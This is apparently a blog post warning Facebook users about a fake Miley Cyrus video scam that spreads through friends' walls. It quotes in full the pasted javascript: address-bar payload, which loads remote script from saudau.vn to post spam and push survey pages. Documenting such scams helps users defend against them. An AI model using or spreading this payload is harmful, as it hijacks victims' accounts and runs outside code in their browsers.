If you see your wall or your news stream on Facebook filled with so many update from friends about a so called Miles Cyrus video it means that your friends has been a victim of this new widget exploit on Facebook. Please resist the temptation to follow the link unless you want to be victimized also. I hope this will be brought to Facebook authorities' attention so that they can stop this immediately.
DETAILS
 |
| A stream of Facebook wall posts |
Seeing this stream of posts of your friends on your wall might spark your interest to follow the links. But for the exprerienced eyes (or kind of paranoid) this looks suspicious. As you can see two of them have the same caption word for word and even capitalization.
So just to prove my doubts on this post I decided to follow the link. After clicking the link, I was redirected to a fanpage with an embedded video that I was supposed to verify that I am above 18. At this point I'm now convinced that there was something fishy with this. That is because for all I know, Facebook does not allow mature content on their site as what their Terms and Conditions states. (Yeah I bothered to read all of that).
To see what this widget is up to, I clicked the continue button to verify that I am above 18. After clicking continue, I was given a set of instructions, It says click the address bar, type j and then press Ctrl+V. Say what? Ctrl+V? As I am quite fond of using keyboard shortcut, I am well aware that it is a shortcut for pasting something. This widget is really up to something not good. Imagine, the widget has an access to your clipboard.
I did what I was instructed, click the address bar (that selects all that was written in there), type J (overwrites whatever address you have in there) and then press Ctrl+V (pastes something to your address bar appended to the "J"). In this case the appended text to "J" was "avascript:(a=(b=document).createElement('script')).src='http://saudau.vn/1/ro.js',b.body.appendChild(a);void(0)" So this line clearly shows that you are about to execute an offsite javascript when you press Enter which is also part of the instruction. After you follow all this instructions you will be shown a dead end page saying that there are no surveys available for your country. So this is really about surveys and not about the video. But wait, there's more. The widget has more payload in the offsite javascript. The script will also post in the walls of random people on your friends list. So it was also trying to spread itself by using the trust you have with your friends. I have accessed the JavaScript code this scam is executing and I have found out that it is using five fake myles cyrus fanpage with the same malicious content. The fanpage id of these pages are 188909304525633, 180090332077859, 234590593270237, 188127947936748 and 136489769788481. Spread the word to your friends and report this to Facebook authorities so that they can stop this malicious widget.
 |
| One of the fanpage that are linked by the wall posts |
 |
| Instructions shown after clicking continue |
 |
| A javascript call being inserted in the address line |
 |
| The dead end page |
 |
| The contents of ro.js the offsite javascript being executed |
